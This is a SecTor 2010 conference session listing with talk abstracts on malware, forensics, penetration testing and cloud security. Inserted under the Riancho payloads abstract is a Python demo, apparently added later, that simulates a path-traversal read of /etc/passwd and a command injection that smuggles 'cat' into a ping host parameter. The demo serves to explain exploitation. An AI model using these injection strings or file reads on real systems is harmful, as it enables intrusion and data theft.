Sessions - 2010

SecTor Session Details

Keynotes

"Attribution for Intrusion Detection" - Greg Hoglund
"Today’s Face of Organized Cyber Crime: A Paradigm for Evaluating Threat" - Steve Kelly
"The Problem with Privacy is Security" - Tracy Ann Kosa
"Involuntary Case Studies in Data Security" - Mike Rothman

Sessions

The final round of speakers has been announced. SecTor 2010 is pleased to present the following:

Tech Track

"SCADA and ICS for Security Experts: How to avoid cyberdouchery" - James Arlen
"Starting an InfoSec Company: Three Founder’s Stories" - Robert Beggs, Dave Millier, Brian O'Higgins and Eldon Sprickerhoff
"Building the DEFCON network, making a sandbox for 10,000 hackers" - David Bryan and Luiz Eduardo
"Dissecting the Modern Threatscape: Malicious Insiders, Industrialized Hacking, and Advanced Persistent Threats" - Brian Contos
"Sharingan – A Ninja art to Copy, Analyze and Counter Attack" - Mrityunjay Gautam
"CLOUDINOMICON: Idempotent Infrastructure, Survivable Systems & Bringing Sexy Back to Information Centricity" - Chris Hoff
"Google's approach to malware on the web" - Fabrice Jaubert
"IPv6, for worse or better" - Joe Klein
"Metasploit Tips and Tricks" - Ryan Linn
"Inside The Malware Industry" - Garry Pejski
"Malware Freakshow 2010" - Jibran Ilyas and Nicholas J. Percoco
"How I Met Your Girlfriend" - Samy Kamkar
"Into the Black: Explorations in DPRK" - Mike Kemp
"What's Old Is New Again: An Overview of Mobile Application Security" - Zach Lanier and Mike Zusman
"Into the Rabbit Hole" - Rafal Los
"Black Berry Security FUD Free" - Adam Meyers
"Beyond Exploits: Real World Penetration Testing" - HD Moore
"The Four Types of Lock" - Deviant Ollam
"Sniper Forensics v2.0 - Target Acquisition" - Christopher Pogue
"Web Application Payloads" - Andrés Pablo Riancho
"Distributed Denial of Service: War Stories from the Cloud Front" - Michael Smith

Management Track

"Gates, Guards, and Gadgets: An Introduction to the Physical Security of IT" - Kai Axford
"SDL Light: A practical Secure Development Lifecycle for the rest of us" - Marisa Fagan
"Mastering Trust: Hacking People, Networks, Software, and Ideas." - Pete Herzog
"How Many Vulnerabilities? And Other Wrong Questions" - David Mortman
"Smashing the stats for fun and profit v.2010" - Ben Sapiro
"400 Apps in 40 Days" - Sahba Kazerooni and Nish Bhalla
"How do we prevent, detect, respond and recover from CRM failures?" - Kelly Walsh

Turbo Track

"Cloud definitions you’ve been pretending to understand" - Jack Daniel
"64-bit Imports Rebuilding and Unpacking" - Sébastien Doucet
"Building your own secure U3 launchable Windows forensic toolkit" - Jason Kendall
"Securing your network with open-source technologies and standard protocols: Tips & Tricks" - Nick Owen
"Fuzzing Proprietary Protocols - A Practical Approach" - Thomas Pröll
"Barcodes: Read it, Write it, Hack it" - Michael Smith
"BLINDELEPHANT: Web Application Fingerprinting with Static Files" - Patrick Thomas
"OMG-WTF-PDF" - Julia Wolf

Sponsor Track

"Microsoft’s cloud security strategy" - Mohammad Akif
"Do it yourself - Security Assessments made easy and FREE" - John Andreadis
"Crime & Carelessness: Gaps that Enable the Theft of Your Most Sensitive Information" - Ryan Boudreau
"Unidirectional Connectivity as a Security Enabler for SCADA and Remote Monitoring Applications" - Lior Frenkel
"Beyond Aurora's Veil: A Vulnerable Tale" - Derek Manky
"A Day in the life of APT" - Adam Meyers
"Realize More Value From Your Existing security Tools" - Dave Millier
"Metasploit Pro – An HD Moore Production" - HD Moore
"Culture Shift: Social Networking and Enterprise Environments (Security Risk vs Reward)" - John W. Pirc
"Today’s Reality: Living in Compromise to Advanced Persistent Threats" - Charlie Shields
"By The Time You've Finished Reading This Sentence, 'You're Infected'" - Eldon Sprickerhoff
"Emerging Threats, The Battle for the Access edge" - Mark Townsend



Keynotes

Attribution for Intrusion Detection - Greg Hoglund

With today's evolving threat landscape, and the general failure of AV to keep bad guys out of the network, effective intrusion detection is becoming extremely pertinent. Greg will talk about using attribution data to increase the effectiveness and lifetime of intrusion detection signatures, both host and network. Within host physical memory, software in execution will produce a great deal of clear text related to behavior, command and control, and API usage - most of which is not readily available from captured binaries or disk acquisitions. Some of this available data relates to how malware was written - the actual source code used. Other data may include forensic toolmarks left by a compiler and even the native language pack used by a developer. Many of these indicators do not change very often - the attackers reuse source code and development tools the same way that any normal software developer does. These indicators are extremely effective at detecting intrusions in the enterprise, especially when combined together. In this way they become a form of attribution - a way to fingerprint individual threat actors. Some of these indicators can even be used to make network security products more effective - for example the DNS names used for command and control. Protocol level information can even be decoupled from DNS and result in NIDS signatures that work even when the attackers rotate their DNS points. Greg will discuss how to analyze host systems, including physical memory, raw disk, and timeline information, to detect intrusions using attribution data. Greg will also discuss how to locate and extract attribution data from captured malware and compromised systems.

Today’s Face of Organized Cyber Crime: A Paradigm for Evaluating Threat - Steve Kelly

Traditional organized crime syndicates and urban street gangs are well understood by law enforcement officials. They have a hierarchy, defined geographic area of influence, and established business model. Cyber criminals, however, are more difficult to categorize. Mr. Kelly will deconstruct “organized” cyber crime and explore a new paradigm for evaluating the threat it poses to users of computer networks.

The Problem with Privacy is Security - Tracy Ann Kosa

Privacy advocates tend to spend a lot of time refuting the high profile discussions about the pending death of privacy, particularly online. This focus would be better spent addressing the cause: security. Identifiable information about us pops up in places you wouldn't expect, leaving a detailed virtual trail. Security mechanisms force the recording, monitoring and auditing of that information in the interest of protecting us from some unseen enemy. Resulting breaches, be they by good guys or bad guys, are covered by the media with some combination of shock and awe. Is it possible to build a better mousetrap? It will probably be expensive, definitely time consuming, and starts with rethinking how the systems we've created to serve us have become the masters.

Involuntary Case Studies in Data Security - Mike Rothman

It is absolutely backwards, but while the bad guys constantly share details of their exploits, including techniques, when it comes to real incidents, actual defenders rarely talk about what worked and what didn't. In this session, Mike Rothman will name names as he builds in-depth case studies based on publicly available information, some of which isn't overly public. He will combine these with the latest information from breach reports and other statistical sources to build a picture of how real breaches happen, which security controls really work, and which compliance checkboxes are a complete and total waste of time.

Sessions

Microsoft’s cloud security strategy - Mohammad Akif

As the adoption and interest in cloud computing grows, technical and business decision-makers are trying to assess the risk associated with using the cloud infrastructure. Join Mohammad Akif, the National Security and Privacy Lead for Microsoft Canada, to learn about the threat landscape for cloud computing and how the industry in general and Microsoft in particular plans to address these concerns.

Do it yourself - Security Assessments made easy and FREE - John Andreadis

With the continually changing threat landscape and continuous demands for compliance with regulatory standards, InfoSec administrators are constantly playing catch-up to keep their systems safe. John will show you 5 easy ways to assess your systems while staying within your zero budget.

SCADA and ICS for Security Experts: How to avoid cyberdouchery - James Arlen

The traditional security industry has somehow decided that they are the white knights who are going to save everyone from the horror of insecure powergrids, pipelines, chemical plants, and cookie factories. Suddenly, every consultant is an expert and every product fixes SCADA. And because they don't know what the hell they're talking about -- 'fake it till ya make it' doesn't work -- they're making all of us look stupid.

Gates, Guards, and Gadgets: An Introduction to the Physical Security of IT - Kai Axford

We're all familiar with using a defense-in-depth strategy when planning information security, but none of that matters if I can take your datacenter and load it into my truck! Join Kai Axford, a Certified Protection Professional (CPP), as he looks at the various aspects of physical security, such as barrier planning, IP surveillance, lock selection (and of course, lockpicking!). Expect plenty of demos and the chance to see most of this stuff in operation.

Starting an InfoSec Company: Three Founder’s Stories - Robert Beggs, Dave Millier, Brian O'Higgins, Eldon Sprickerhoff

Ever wonder what it’s like to start your own InfoSec company? Join our “InfoSec Corporate Founders’ Panel” as they trade war stories, describe strategies and mishaps, and offer advice.

Crime & Carelessness: Gaps that Enable the Theft of Your Most Sensitive Information - Ryan Boudreau

"Information is power and money. Our professional lives revolve around building, inventing and working with more valuable information. How we protect and manage this information is core to the success of our economy, organizations, corporations and our personal lives. In this presentation we will explore how a criminal industry now larger than the international drug trade works to steal our information. Targeting areas of operational weakness, these organizations effectively steal more than $600 Billion of information every year. There are best practices to follow and we will discuss ways in which technology, process and education can greatly hinder what will continue to be an active attack on our most valuable resource: information."

Join Ryan Boudreau and learn how Symantec is leading the world in Prioritizing Data Protection.

Building the DEFCON network, making a sandbox for 10,000 hackers - David Bryan and Luiz Eduardo

David covers how the DEFCON network team builds a network from scratch in three days with very little budget: how this network evolved, what worked for him, and what didn’t work over the last ten years. This network started as an idea and, after acquiring some kick butt hardware, has allowed them to support several thousand users concurrently. In addition David will cover the new WPA2 Enterprise deployment, what worked and what didn’t, and how the DEFCON team is going to make the Rio network rock!

Dissecting the Modern Threatscape: Malicious Insiders, Industrialized Hacking, and Advanced Persistent Threats - Brian Contos

This is an intermediate to advanced level presentation that pulls from McAfee Labs research as well as real-life customers. This is original content designed to paint a clear picture of today’s threat landscape and, through doing so, illustrate the differences between insider threats, industrialized hackers, and APTs. Attacks are coming from all angles. In some cases they are very rudimentary; in others they are highly complex. Organizations must be able to protect themselves regardless, and do so in a way that is in parity with business operations, maintains employee and partner agility, and is manageable without the complexity of the solution being worse than the attack itself. Failure to address these three different attack types can result in everything from diminished brand loyalty, regulatory penalties, and lost revenue, to stolen intellectual property, economic competitive disadvantage, and military competitive disadvantage.

Cloud definitions you’ve been pretending to understand - Jack Daniel

We’ve all heard talks where we nodded in agreement with the speaker when he or she launched into jargon we didn’t comprehend. In this talk Jack, assisted by sock puppets, will explain common cloud computing terminology and discuss some common misconceptions about cloud computing.

64-bit Imports Rebuilding and Unpacking - Sébastien Doucet

64-bit malware are coming! 64-bit malware are coming! I’ve been repeating this for the last 2 years; it’s not tinfoil hat talk anymore. With 64-bit packers and protectors being released, there is presently a growing need to create new tools to facilitate the manual unpacking process for malware analysis and to make it as trivial as it is now for protected 32-bit executables. Accordingly, I will be showcasing two tools, CHimpREC and CHimpREC-64, allowing the spirit of ImpREC (the now obsolete imports rebuilding tool) to live on with the best possible compatibility across all the x64 versions of the Windows operating system. This presentation will uncover the inner workings of coding a 32-bit imports rebuilder and the problems encountered due to the WoW64 environment and Address Space Layout Randomization. Additionally, I will provide an overview of the differences between the PE and PE32+ formats and their impact on porting CHimpREC to 64-bit. The presentation will conclude with 2 or 3 short live unpacking sessions with different examples of 64-bit packers, showing how trivial it has become to deal with them with the help of CHimpREC-64 and demonstrating that obfuscation by obscurity is not an excuse anymore to ignore 64-bit malware.

SDL Light: A practical Secure Development Lifecycle for the rest of us - Marisa Fagan

Security companies are beginning to attack the problem of software vulnerabilities at the source: the development process. Secure coding programs like Microsoft SDL, OWASP SAMM, and BSIMM save the organization money and time by taking the bugs out at the beginning, avoiding costly incident response nightmares. Chris Wysopal, CTO at Veracode, says "Many of these methodologies are fairly new. Many development organizations don't have the process rigor or the resources to do anything more formal than use one tool or service as part of the development lifecycle." A survey done by Errata during RSA shows there is a great demand in the industry for making these secure coding programs more affordable and less resource intensive.

Unidirectional Connectivity as a Security Enabler for SCADA and Remote Monitoring Applications - Lior Frenkel

Network segregation (also called “air-gapping”) is considered a foolproof method for protecting networks from external attacks or from data theft/leakage. Unfortunately, employing this method mandates users to forego all benefits of connectivity; hence this method is not acceptable today as a viable security means.

Unidirectional connectivity, hardware enforced over all layers of communications, is an interesting compromise between full connectivity and full segregation. Unidirectional Security Gateways are now becoming a viable option for securing SCADA and other industrial and critical networks.

This session will review the existing security postures evident in SCADA networks and then introduce the concept of unidirectional connectivity. A detailed analysis of the advantages and limitations of unidirectional connectivity-based security solutions will be presented, including the resulting SCADA network architectures created when employing unidirectional connectivity security means. Additional analysis will be provided regarding the effects and requirements that unidirectional connectivity imposes on the methodology and use of SCADA applications employed on such networks. In addition, this session will discuss compliance concerns with specific reference to NERC and NRC regulations.

Sharingan – A Ninja art to Copy, Analyze and Counter Attack - Mrityunjay Gautam

Many products in the industry have or use some kind of proprietary network protocol. Most of these protocols do not have packet level documentation in place, neither with the development team nor with the architect. In some instances, the security assessment team/auditor might be dealing with a network protocol which a third party wrote and our organization has deployed in the intranet. When the security auditor/group is faced with the problem of assessing the security robustness of these protocols, they can either do blind fuzzing or capture the communication over the wire and do a manual analysis to find patterns in the various packets. The first approach is not very effective for most protocols and the second approach takes extensive time. The question is – how do you deal with a multitude of such protocols built into the various products being developed or deployed (third party products) by your company?

This session presents the implementation level design and demonstration of a tool which addresses this problem and automates the entire process. The tool sniffs packets from the wire, analyzes the packets using artificial intelligence algorithms and heuristics to find the structure of the packet, and generates custom intelligent fuzzers from the derived structural information specific to this protocol. The only manual step is to point the fuzzer at the targeted protocol and get information on its security robustness status. This session is intended to demonstrate an idea which is currently (in the demo) being applied to network protocols only, but it can just as well be used on file formats for automated file fuzzer generation. The idea here is that with this tool in place, the overall security posture of the organization would be significantly improved. Also, the products being shipped out by the company would be better in terms of network level security robustness.

Mastering Trust: Hacking People, Networks, Software, and Ideas. - Pete Herzog

Why can't we make the right decision all the time? Our sense of trust is broken. Lies, deceit, fraud, and insinuations make up a large part of crime for a reason. We are bad at trust. It's in our biology. It's why we sometimes make the wrong friends, date the wrong people, buy the wrong car, and do things that in retrospect were really really dumb. Now consider the fact that trust makes up the majority of security decisions, from who you let in to what you connect to, and you see we have a very big problem. This talk shows you how we are broken, how to analyze and test trusts, how the ISECOM trust metrics work, how they are used to replace risk assessments in many organizations, and how they can help you make better overall decisions.

CLOUDINOMICON: Idempotent Infrastructure, Survivable Systems & Bringing Sexy Back to Information Centricity - Chris Hoff

Mass-market, low-cost, commodity Infrastructure-as-a-Service cloud computing providers abstract away compute, network and storage and deliver hyper-scalable capabilities.

This "abstraction distraction" has brought us to the point where the sanctity and security of the applications and information transiting them are dependent upon security models and expertise rooted in survivable distributed systems, at layers where many security professionals have no visibility.

The fundamental re-architecture of the infostructure, metastructure and infrastructure constructs in this new world forces us back to the design elements of building survivable systems focusing on information centricity -- protecting the stuff that matters most in the first place.

The problem is that we're unprepared for what this means, and most practitioners and vendors focused on the walled garden, perimeterized models of typical DMZ architecture are at a loss as to how to apply security to disintermediated and distributed sets of automated, loosely-coupled resources.

We're going to cover the most salient points relating to how IaaS cloud architecture shifts how, where and by whom security is architected, deployed and managed in this "new world order", and what your options are in making sustainable security design decisions.

Malware Freakshow 2010 - Jibran Ilyas and Nicholas J. Percoco

We had a busy year. We investigated over 200 incidents in 24 different countries. We ended up collecting enough malware freaks [samples] to fill up the Kunstkammer a few times over. Building upon last year's DEFCON talk, we want to dive deeper and bring you the most interesting samples from around the world - including one that made international headlines and the rest we're positive no one's ever seen before (outside of us and the kids who wrote them). This talk will bring you 4 new freaks and 4 new victims including: a Sports Bar in Miami, an Online Adult Toy Store, a US Defense Contractor, and an International VoIP Provider. The malware samples we are going to demo are very advanced pieces of software written by very skilled developers. The complexity in their propagation, control channels, anti-forensic techniques and data exporting properties will be very interesting to anyone interested in this topic.

Google's approach to malware on the web - Fabrice Jaubert

This talk looks at how Google searches for malware on the web, and how those findings are made available through the public SafeBrowsing API. We will describe the mechanisms by which malware is generally distributed, and how Google detects infected and malicious websites. Finally, we will discuss some of the newer trends we have seen in our study of malware on the web.

How I Met Your Girlfriend - Samy Kamkar

How I Met Your Girlfriend: The discovery and execution of entirely new classes of Web attacks in order to meet your girlfriend. This includes entertaining and newly discovered attacks including PHP session prediction and random numbers (accurately guessing PHP session cookies), browser protocol confusion (turning a browser into an SMTP server), firewall and NAT penetration via JavaScript (turning your router against you), extracting extremely accurate geolocation information from a Web browser (not using IP geolocation), and more.

400 Apps in 40 Days - Sahba Kazerooni and Nish Bhalla

You are an information security practitioner who finds themselves responsible for the security of their organization’s data. From an application perspective you are most likely looking at hundreds, if not thousands, of internet-facing domains. How do you prioritize one over another? How do you do this on-time and on-budget? This presentation aims to provide answers to these classic challenges. Sahba Kazerooni and Nish Bhalla will present a real-world case study where the requirement is simple: reduce the risk to an organization from all external-facing applications. The discussion is interwoven with lessons of attack surface discovery, risk analysis and application assessment methodology.

Building your own secure U3 launchable Windows forensic toolkit - Jason Kendall

This toolset attempts to provide an easy to use U3 drive to gather forensic data from a Windows computer. The entire toolset is located on the read-only portion of the U3 drive, and reports are written to the writeable portion.

Into the Black: Explorations in DPRK - Mike Kemp

North Korea scares people. Allegedly DPRK has a super l33t squad of killer haxor ninjas that regularly engage in hit-and-run hacks against the Defense department, South Korea, or anyone else who pisses off the Glorious Leader. DPRK also has no real Internet infrastructure to speak of (as dictators don't like unrestricted information), although it does have a number of IP blocks (unused?). This talk examines some of the myths about DPRK, and some of their existing and emerging technologies. This talk also examines some of the available infrastructure associated with DPRK (funnily enough some of which is in South Korea and Japan) and explores the potential technical threats posed by a pernicious regime, as well as exposing some of the huge gaps in logic that have led to the world potentially engaging in chicken little syndrome when it comes to DPRK. No 0days will be demonstrated; however, this talk will discuss some new information that hasn't yet been made public, and will hopefully call time on the whole 'cyberwar' sideshow.

IPv6, for worse or better - Joe Klein

It is about to happen: the long promised upgrade from IPv4 to IPv6 is on our doorstep. The initial reason for this change of the Internet's layer 3 protocols was to head off the projected 2010-2012 depletion of IPv4 reported back in 1994. As a stop-gap method until IPv6 was fully deployed, the Internet Engineering Task Force (IETF) chose to implement many standards which were intended to first extend the life of the address space and second help the transition to native IPv6-only networks. In addition, the IETF decided to reengineer the protocol, adding many features which will make Internet communications easier, more robust, flexible, agile, lighter weight and secure. But within these decisions lay unintended consequences to security.

This presentation will discuss the deeper justification for moving to native IPv6, decisions along the way which made IPv4 more difficult to secure, the impact of transition protocols used to connect the "Islands of IPv6 across seas of IPv4"/"Islands of IPv4 across seas of IPv6", the failure of security and IT vendors to provide IPv6 tooling at parity with IPv4, which leaves networks vulnerable, and local network failures built into the protocol. Finally, the vast majority of security professionals and hackers assume that IPv6 is just like IPv4; it is not, so we will discuss how to connect, operate, penetrate and secure IPv6 enabled systems.

What's Old Is New Again: An Overview of Mobile Application Security - Zach Lanier and Mike Zusman

The ever-increasing prevalence of mobile devices brings with it a slew of security problems. Applications running directly on mobile devices (and web apps optimized for mobile clients) are ripe for the picking even by unsophisticated attackers. The attack classes that once applied to traditional network-facing, fat client, and web applications are now valid for mobile apps, as well. Insecure authentication and access control; home-grown crypto; and memory management problems are just some of the issues resurfacing on this new frontier. This presentation will discuss the security of some of the most popular applications running on mainstream mobile platforms such as Android, iPhone, Blackberry, and Windows Mobile.

Emerging Threats, The Battle for the Access edge - Mark Townsend

Your network is under attack. Malware, Trojans, botnets and a host of other threats are alive and well on the Internet. The people who produce these threats have a new target -- the wired and wireless edges of your network. To effectively detect and manage these threats you need a management platform that provides a single integrated view of both the wired and wireless infrastructures. With fast moving worms able to scan and infect thousands of systems in a few seconds, network administrators need to be able to quickly deploy new security policies to the entire infrastructure. Find out how the Enterasys solution provides an integrated management view for both the wired and wireless infrastructures. This integrated view enables network administrators to easily deploy fine grained security and class of service controls to the entire infrastructure with a single click. Enterasys solutions are standards-based and fully interoperable with all major networking vendors. Compliance requirements are addressed efficiently. Mission critical services are protected and the threats are controlled.

Metasploit Tips and Tricks - Ryan Linn

There are tons of tutorials to get started with Metasploit, but have you ever wanted some tips to help use the framework more efficiently? This presentation will cover some tricks to help get the most out of Metasploit. You will see demonstrations and learn how to build payloads within Metasploit, use the database effectively, pivot between protected systems, and perform additional discovery from already compromised machines. Each demonstration will show the steps from start to finish so these techniques can be applied directly in your environment.

Into the Rabbit-Hole - Rafal Los

Since the caveman first fashioned a spear, humans have been using tools to make them more efficient and effective. Unfortunately, today's analysts often misunderstand the role tools play in testing web applications. While tools can be quite good at mapping a web application's attack surface, there is still much human analysis that must be done to find the elusive defects that lie just below the surface. That human analysis is daunting and irregular ... until now.

The answer is an execution-flow-based approach to application security testing. By first understanding application logic and execution flow it is possible to completely map a web application's attack surface, and therefore fully test the application. Along the way we will cover understanding the principles of application-flow analysis, application process mapping and building execution-flow diagrams (EFDs) which together form a complete picture of the web application and allow an analyst to do a thorough job. This talk focuses on how to get the whole picture of the application by mapping logic and execution flow of the application and uncovering potentially critical defects.

Beyond Aurora's Veil: A Vulnerable Tale - Derek Manky

In 2009, the Conficker worm was dissected by researchers, and then fried by the spotlight on a worldwide stage. One year later, we saw the Aurora assaults similarly glow in the headlines. Defense was tense against these two nasties – yet, in each case, easily circumvented by two potent zero-day exploits that crept in from the digital depths. Derek Manky will provide case studies on the zero-days, along with live demonstrations.

Manky will go on to highlight drive-by attacks launched during Conficker's rise, which have provided growth to one of today's largest botnets – Bredolab. He will show sophisticated techniques and structure Bredolab has developed over the course of a year. Illuminating their shadows, Manky will unveil these threats in order to provide insight and provoke thought for a broader defense strategy, instead of using the reactive tunnel-vision that is all too common.

Black Berry Security FUD Free - Adam Meyers

As mobile computing devices proliferate the enterprise more 'security' conscious people are raising flags about mobile device security. One device which is dominant in the enterprise mobile computing world is the ubiquitous Blackberry(TM), which has quite a bit of Fear Uncertainty and Doubt surrounding it and its security controls. Rumors about blackberry compromises and confusion about remote access toolkits for the Blackberry run amuck in many circles. This presentation aims to set the facts straight by going right to the source - literally - in an effort to dispel FUD about the device, we will look to Research In Motion (RIM) documentation, API, and SDK to enumerate the facts and squash the FUD. The presentation will also explore the Printed Circuit Boards (PCB) in several devices to examine the architecture and chip sets, and a disassembled operating system will be examined as well.

A Day in the life of APT - Adam Meyers

The term 'Advanced Persistent Threat' has dominated the cyber security world for the last several years. This marketing construct is designed to describe a real and widespread threat, but seems to cause confusion and mockery. This presentation will cut through the marketing hyperbole and walk through an attack by a sophisticated actor, demonstrating the tools and techniques of one APT incident and providing insight into defensive techniques and tools that may aid the network defender.

Realize More Value From Your Existing security Tools - Dave Millier

Dave Millier will talk about leveraging information gathered from various sources (security and system logs, reports, processes, and directly from people) and turning it into meaningful reports and dashboards that can be used to track compliance with various standards and regulations, including PCI, CobiT, SOX, NERC CIP and others. Rather than focusing on any particular technology, Dave will explain how companies can get more value out of the security tools they've already invested in, how to provide metrics that are meaningful, and how to build reports that are actually useful at various levels within an organization, from C-level executives right down to the firewall administrators, and even end users.

Beyond Exploits: Real World Penetration Testing - HD Moore

This presentation focuses on abusing design flaws, configuration errors, and information leaks to gain access to typical environments. The open source Metasploit Framework will be used as the demonstration platform to illustrate how individually low-risk information leaks can be combined to gain administrative access to a target network.

Metasploit Pro – An HD Moore Production - HD Moore

Join Metasploit founder and Rapid7 CSO, HD Moore, to learn about Metasploit Pro, a new commercial penetration testing tool based on the open source Metasploit Framework. Metasploit Pro’s graphical user interface enables ethical hackers to quickly and easily launch simultaneous, sophisticated attacks against several targets. Metasploit Pro automates common tasks such as smart bruteforcing, evidence collection and reporting to speed up your pen testing assignments.

How Many Vulnerabilities? And Other Wrong Questions - David Mortman

At every security conference there's always a group of people asking which is more secure: Windows or Mac, Apache or IIS, IE, Chrome or Firefox. Viewing security solely as a question of vulnerabilities is like judging a loaf of bread solely on how many slashes the baker put on top of it. It just doesn't matter. It's not about which has more patches or which has more vulnerabilities. The question is actually which one will cost you the least time and money to consistently manage well. InfoSec is a cost center and security incidents cost money. If we're going to cut costs and make infosec more efficient we need to focus on where the money is actually being spent and not on where it's sexiest to look. We're so focused on the "cool" that we're overlooking what needs to be done. This pragmatic talk will give you what you need to do your job better and at a lower cost. It will also get you homemade bread.

The Four Types of Lock - Deviant Ollam

Physical security is an oft-overlooked component of data and system security in the technology world. While numerous ratings and standards exist to classify specific security hardware, many of these standards are ill-defined and poorly understood. Do you know what makes a "hardened" or "contractor grade" lock special? What does the phrase "high security" signify on hardware packaging? As it turns out, many of these terms are just for show... but Deviant will walk you step by step through some distinct and easy-to-follow examples of how low-grade locks fail, as well as how to clearly identify quality equipment. Additionally, we will cover the more difficult matter of hardware purchase decisions at the highest levels... fine distinctions such as which locks belong on the CEO's office versus which ones to use on your server rooms. Every situation calls for something a bit different, and those differences add up when you're spending $100 or more per lock. Make your money count and keep your budget, and your data, secure.

Securing your network with open-source technologies and standard protocols: Tips & Tricks - Nick Owen

We are continually asked "Does your product work with VPN X?". This is the wrong question. The right question is whether any product on your network supports the authentication protocol you have chosen as a standard. Once you decide on a standard, the world opens up to you: specifically, the world of open source software. After briefly discussing authentication protocols, I will demonstrate how easy it is to protect software packages and remote access solutions such as SSH, Apache, OpenVPN and FreeNX with two-factor authentication. Many people are simply not aware of the open-source remote access solutions available, and still more are not aware of how to integrate them into a network. This talk seeks to rectify that.

Inside the Malware Industry - Garry Pejski

Not much is known about the malware industry and how it makes money. This talk will break the silence and expose the shady techniques used to create and spread this software, all from the perspective of someone who worked there.

Culture Shift: Social Networking and Enterprise Environments (Security Risk vs Reward) - John W. Pirc

Social networking, for most of us, is becoming wrapped into our DNA, and this is especially true for the next-generation workforce. Today's employees, and tomorrow's, will expect to be able to blog and use social networks with corporate assets and corporate bandwidth; at the same time, these technologies are widely used for corporate marketing and communication. That's why it's important to look at all aspects of securing your infrastructure and, more importantly, the people who drive your organization today. This involves educating people, corporate process and the right security technologies. The session will cover the benefits and the security risks inherent in social networking across all business verticals.

Sniper Forensics v2.0 - Target Acquisition - Christopher Pogue

Last year at SecTor, Christopher debuted "Sniper Forensics", which illustrates how to use live analysis techniques to improve the efficiency and accuracy of forensic investigations. Since then, Sniper Forensics has been presented at two other computer security conferences. Now, Sniper Forensics v2.0: Target Acquisition will cover the questions most often asked by audience members of the original talk. Where do I begin? What questions do I ask? How do I know when I have a target? How do I integrate my findings into my report? How do I use Sniper Forensics to run my investigation? These questions and others will be addressed.

Web Application Payloads - Andrés Pablo Riancho

This talk will introduce attendees to the subject and show a working implementation of Web Application Payloads, which use the "system calls" exposed by vulnerable Web applications to collect information from, and gain access to, the remote Web server. The Web application payloads implementation was developed as part of the w3af framework, an open source Web application attack and audit framework developed by contributors around the world since 2007 and led by Andrés Riancho (the speaker) since its conception.
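To make the "system calls" idea concrete, here is an added example written for this page; it is not w3af's implementation. Each exploited vulnerability is wrapped as a small primitive, here `read(path)`, and the payload is written against that primitive rather than against any particular bug, so the same payload runs unchanged over a local file inclusion or an OS command injection. The target application, its file system, both vulnerable endpoints and the toy shell that interprets the injected command are all simulated in-process and are constructed for the example.

```python
import posixpath
import shlex

# Constructed file system of the simulated target.
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
                   "deploy:x:1000:1000::/home/deploy:/bin/bash\n",
    "/var/www/config.php": "<?php $db_pass = 'hunter2';\n",
    "/var/www/pages/index.html": "<h1>hello</h1>\n",
}

# --- Two simulated vulnerable endpoints (stand-ins for HTTP handlers) ---

def lfi_endpoint(params):
    """?page=... concatenated onto a directory: local file inclusion."""
    target = posixpath.normpath("/var/www/pages/" + params.get("page", "index.html"))
    return FAKE_FS.get(target)

def ping_endpoint(params):
    """?host=... interpolated into a shell command: OS command injection.
    A toy shell understands ping, echo and cat so the example runs offline."""
    out = []
    for part in ("ping -c 1 " + params.get("host", "")).split(";"):
        argv = shlex.split(part)
        if argv[:1] == ["ping"]:
            out.append("PING %s: 1 packets transmitted" % argv[-1])
        elif argv[:1] == ["echo"]:
            out.append(" ".join(argv[1:]))
        elif argv[:1] == ["cat"] and len(argv) > 1:
            out.append(FAKE_FS.get(argv[1], "cat: %s: No such file" % argv[1]))
    return "\n".join(out)

# --- "System call" layer: one read() primitive per vulnerability class ---

class LFIShell:
    """read() built on the inclusion bug: traverse up, then down to the file."""
    def __init__(self, request, depth=3):
        self.request, self.depth = request, depth

    def read(self, path):
        body = self.request({"page": "../" * self.depth + path.lstrip("/")})
        return body or ""

class CmdInjShell:
    """read() built on command injection; the file is bracketed with a marker
    so it can be cut out of the command's normal output."""
    MARK = "8f1c2b"   # constructed delimiter

    def __init__(self, request):
        self.request = request

    def read(self, path):
        cmd = "127.0.0.1;echo %s;cat %s;echo %s" % (self.MARK, shlex.quote(path), self.MARK)
        parts = self.request({"host": cmd}).split(self.MARK)
        return parts[1].strip("\n") + "\n" if len(parts) >= 3 else ""

# --- Payload: written once against read(), independent of the bug underneath ---

def users_with_login_shell(shell):
    """List accounts whose shell is not a nologin shell."""
    users = []
    for line in shell.read("/etc/passwd").splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not fields[6].endswith("nologin"):
            users.append(fields[0])
    return users

if __name__ == "__main__":
    for shell in (LFIShell(lfi_endpoint), CmdInjShell(ping_endpoint)):
        print(type(shell).__name__, users_with_login_shell(shell))
```

The delimiter trick in `CmdInjShell` is the part that matters in practice: command output arrives mixed with the application's own response, so the primitive has to bracket what it wants with a marker and cut it out. A payload only depends on the primitives it calls, so adding a `write()` or `execute()` primitive to one shell class makes more payloads available without touching the others.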

Involuntary Case Studies in Data Security - Mike Rothman

It is absolutely backwards: the bad guys constantly share details of their exploits, techniques included, while when it comes to real incidents actual defenders rarely talk about what worked and what didn't. In this session, Mike Rothman will name names as he builds in-depth case studies based on publicly available information, some of which isn't overly public. He will combine these with the latest information from breach reports and other statistical sources to build a picture of how real breaches happen, which security controls really work, and which compliance checkboxes are a complete and total waste of time.

Through these case studies you'll learn:

  • From your peers, through real-world examples of breaches, some of which haven't been publicly reported or widely discussed
  • Which security controls can really protect you during an incident
  • How breaches happen, and ways you can prevent breaches in your organization
  • How to prioritize your security efforts so you are best prepared to prevent an incident or, in the worst case, deal with one

Smashing the stats for fun and profit v.2010 - Ben Sapiro

“Smashing the stats for fun and profit v.2010” (or how to convince your boss to spend properly on security)

We all know that security vulnerabilities need to be fixed but it can be hard to convince your employer that you deserve a budget so you can do your job properly.

Using research from the 2010 Canada-wide security survey, we'll explore (FUD- and vendor-free) the following topics:

  • Do people still forget about application security?
  • Which approaches work in getting the business to understand security issues?
  • How much should you spend on security?
  • What’s the right way to identify security problems in your environment so they get fixed?

The talk will cover the all-new 2010 survey data together with unique content for SecTor attendees.

Fuzzing Proprietary Protocols - A Practical Approach - Thomas Pröll

Proprietary protocols are common in industrial environments and are hard to fuzz. Often a single product, such as a railway control centre, communicates over more than 10 proprietary protocols. External attackers usually do not have the protocol specifications needed to write suitable fuzzers, and the same applies to internal penetration testers. Even with the specifications, time and budget are rarely sufficient to implement an effective fuzzer, and commercial fuzzers are out of the race for the same reasons. With inline fuzzing, even these protocols can be tested.
